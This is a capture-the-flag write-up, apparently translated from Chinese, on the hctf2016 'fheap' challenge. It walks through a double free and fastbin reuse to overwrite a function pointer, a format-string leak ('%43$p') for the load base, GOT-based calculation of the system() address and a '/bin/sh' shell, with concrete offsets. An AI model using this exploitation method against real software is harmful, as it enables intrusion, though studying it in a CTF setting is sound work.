0x00
Catalogue
Vulnerability principle
Two-time release
How to modify a function address before the second release
Characteristics of Fastbin
Modifying the function pointer flow
How to get the load base of a process
Formatting a string vulnerability
To determine that the printf function is offset in the code snippet
The printf function outputs the desired address
How to get the address of the system function
Looking for a function that is called by the fheap process and is in the same so library as the system function a
Get the address of function A by reading the value of function A in the corresponding position in GOT.PLT
Calculates the offset of the system relative to function A in the so library by reading the information in the DYNSYM segment
Actual Operation effect
Summary
Resources
0x01
Vulnerability Principle
The program itself implements a system of managing strings, but when released, the pointer is empty to determine if the index represents a place with a string, and if the pointer is not empty, it can be released. But after the release, the pointer is not empty, so it can be released two times and released multiple times.
Figure 1 The vulnerability trigger principle
0x02
How to modify a function address before the second release2.1 Fastbin Characteristics
According to [Resources I], Fastbin maintained chunk nine grades, size from 16 bytes to 80 bytes, one grade per 8 bytes. The 0x20 (32) bytes that we asked for are 48 bytes (because each chunk also has a 16-byte management area), so the chunk that we have applied for 0x20 space are grouped into the list of fastbin[5].
2.2 Modify the function pointer Flow 1) Create a memory layout after four strings
Figure 2 Creating a memory layout after four strings
The 8 blocks allocated in the heap are arranged sequentially from top to bottom in the heap. There is no sequential arrangement because each block is preceded by a 16-byte chunk admin area that is not drawn.
2) Delete the memory layout after four strings
Figure 3 Delete Four characters post-creation memory layout
Because freeing memory in GLIBC is a direct addition of 16 to 80 spaces into a linked list in the Fastbin array, we can find the memory block we freed in the linked list represented by fastbin[5]. While the Fastbin in the link list in and out of the rules is advanced, so the first release of the STR0 related blocks at the end of the chain, and the last release of STR3 related blocks in the position of the chain header. See Figure 3 for details.
3) Modify Release_ptr mode
After releasing the string, and then create a 0x80 size string, because the size of Str_manage is 0x20, so str_manage storage space or fastbin from the allocation, at this time Str0_manage and the original Str3_manage coincident , but because the space in which the characters need to be stored is 0x80, the chunk block that holds the data is not obtained from Fastbin, but is then allocated after the above 8 blocks. In this way, we re-create the string str1_manage and the original String3 coincident, string1 and the original Str2_manage coincident, then we write the string str1 will overwrite the original str2_manage structure, Then when we release str2 again, we will still interpret the next 8 bytes of the str2_info_ptr point to the address as a function pointer and invoke it. We write the function we want to execute, and delete str2 executes our function.
Figure 4 Modifying the release_ptr mode
0x03
How to get the load base of a process
At this point we can already let the program execute the function we need. But what is the address of the function we are going to execute? First, the value of Release_ptr is the function of the FHEAP program, that is, the value is in the code snippet. Let's take a look at the memory distribution graph after the process is running.
Figure 5 Memory Area distribution after Fheap run
As you can see, the heap is not allocated at this time, and the LIBC library is loaded into 0x7ffff7a0e000, but we can ensure that the LIBC library is loaded to the same address each time. No, then what information do we have now? We have the source program, and we know the offset of each instruction in the code snippet relative to the process base, and if we only modify the low byte at release_ptr, then we can transfer to any instruction in the code snippet.
So where do we get the program to be more useful? Or in what way can the program's load base address be used for subsequent work? The author of [Reference II] uses a formatted string method to obtain the program base address.
3.1 Formatting a string vulnerability
[Reference three] always have a very detailed introduction, here no longer repeat, simply say the principle. When we use printf, we usually pass a formatted string in the normal form and pass the data we want to print as a parameter. But what if we just pass the formatted string without passing the arguments? See.
Figure 6 Formatting a string vulnerability hint
What's going to happen? printf interprets the data after arg1 according to the format characters.
Here, we just read the data on the stack, as to how to read the data of any address, or see [Reference three], the principle is the same. It's just not for our example.
3.2 Determine that the printf function is offset in the code snippet
Because of the use of location-independent code (PIC) technology, the functions of printf in a dynamic library that are implemented outside of the program are used by the compiler locally. The PLT segment adds an agent function, as described in [reference four]. So we're going to find the local agent function for print. See.
Figure 7 Printf_plt
The 0x9d0 is populated to the low two bytes of the release_ptr, allowing the program to flow to PRINTF_PLT. This allows you to complete the reading of data at any address.
3.3 printf function output the desired address
So how do we get the process to load the base address? Recall that when the program control is passed to the release function, this is in the delete function, and the delete function is called in Main, so the stack must return the address in main. The only time we need to do this is to dynamically debug it once, and see where to save the return main function address in the stack before executing the release function.
Figure 8 Information in the stack before the release function is executed
It can be found that the confirmation string "YES.AAAABBBBBBBBCCCCCCCC" we entered before the deletion has been placed in the stack. The rest is to calculate the position of the ret_mian_addr to get in the stack. You can see that the ret_mian_addr is 0x6f8 in the stack, and the top of the stack is 0x5d0. What is the equivalent of offsetting the number of parameters? Offset (0x6f8-0x5d0)/8=37 parameters.
However, this is the program on the 64-bit machine, do not forget that the calling function of the rules also includes the first six parameters saved in six registers. So the total number is added to 6, namely 37+6=43.
So, do we need to print 43 parameters to get the data we want? Fortunately, a method has been introduced in [reference three] that prints the value of the specified position, namely: "% parameter Location $ format". For example, we want to print the 43rd parameter in the format of the address, it can be written like this: "%43$p", it is very convenient indeed.
In this way, we can get ret_main_addr.
So how do you use this address? This address is in the range of the main function, and we can see this address in Ida from the process start address offset to 0XCF2.
So the process load base is RET_MAIN_ADDR-0XCF2.
0x04
How to get
system
address of the function
We're going to open a shell and get the address of the system function. The system function is in the LIBC library. But the address for each load of this library is not unique, how do we get the address of the function in the LIBC library?
If we can get the address of any variable or function in the LIBC library through the process itself, we can know the address of all variables or functions by looking at the libc symbol table.
4.1 Looking for a function called by the FHEAP process and in the same so library as the system function a
Maybe read this function can contact the process and library (here I am also a learner, accumulate skills).
4.2 Get the address of function A by reading the value of function A in the corresponding position in GOT.PLT
So how do you get the address of the read function? The use of location-independent code (PIC) technology enables us to achieve demand. Pic Technology is implemented by adding the Got table to the elf file through the compiler. See [Reference four], it's good to write, there are examples. What is stored in the Got table? Is the address of the function in the dynamic library called by the program. For read, the actual address of the read function is put. So what's the position of read in the Got table? Because read is a function, its position is offset at some point in got.plt, and at load time, offset is populated with the address of the second instruction of the read function on the local proxy read_plt function. It is not the actual address of read in libc, so it will be revised again when the dynamic loader is appropriate (see [reference four] to explain the appropriate meaning). Then in the relocation information, there must be read in the GOT.PLT address. We look at the relocation information.
See.
Figure 9 Relocation information for the Read function
As you can see, the actual address of the Read function is filled in by the dynamic loader at the base 0x202058 where the relative process is loaded. We get the load base of the process, so we can know the code snippet and any data in the data segment.
4.3 Calculating the system address by reading the information in the DYNSYM segment
Now that we know the address of the read function, how do we get the address of the system function? The distance between read and system must be certain, knowing the relative distance, you can know the address of the system.
Each symbolic address that can be called by another program or library is recorded in the. Dynsym segment of the dynamic library, and this address is written as an offset from the logical address 0. is used to facilitate the dynamic loader to modify the Got table. Let's look at the information in the. Dynsym for read and system.
Figure Ten read function information in Dynsym
Figure one of the system functions in Dynsym information
By these two messages, it is possible to calculate that the offset of the system relative to read is -0xb12e0.
0x05
actual operation effect
With the system address, we modify the release function pointer by creating a string, and the string actually addresses are passed in, so that the beginning of the created string can be written as "/bin/sh", as the system opens the shell's arguments. When we delete str2 again, we execute the system function and start a shell.
Figure 12 successfully opening the shell
0x06
Summary
It took 15 hours to understand the intentions of the authors in [Reference II], which was quite a big gap with others. Before just have positive knowledge and understanding, I feel the analysis of this problem, not only used the theoretical knowledge of the past to use a bit, also seems to open the door of another world of thought.
This involves knowledge points:
-
- Two-time release
- GLIBC Memory Management Overview
- Formatting a string vulnerability, printing a value at a specified location
- Dynamic Relocation Related knowledge
- GDB debugging
0x07
References
[1] glibc Memory Management Introduction:
Https://sploitfun.wordpress.com/2015/02/10/understanding-glibc-malloc/comment-page-1/?spm=a313e.7916648.0.0.rJLhzh
[2] fheap exploit program:
Http://bobao.360.cn/ctf/detail/179.html
[3] Formatting a string vulnerability:
http://etutorials.org/Networking/network+security+assessment/Chapter+13.+Application-Level+Risks/13.7+Format+String+Bugs/
[4] "Deep Exploration of Linux operating systems: System Building and Principle analysis" Wang Busheng
hctf2016 fheap Study (Solution of Flappypig team)